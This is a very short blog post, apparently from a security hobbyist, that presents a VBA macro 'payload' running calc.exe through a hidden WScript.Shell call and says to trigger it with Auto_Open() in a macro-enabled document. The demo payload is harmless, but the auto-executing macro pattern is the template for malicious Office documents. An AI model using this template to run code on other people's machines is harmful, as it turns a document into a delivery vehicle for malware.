VBA
- Thiru T
- Nov 6, 2024
- 1 min read
Creating payload:
Sub calc()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End SubExecute: Set function to Auto_Open() in macro enabled document
Changes is the only thing which never change
Comments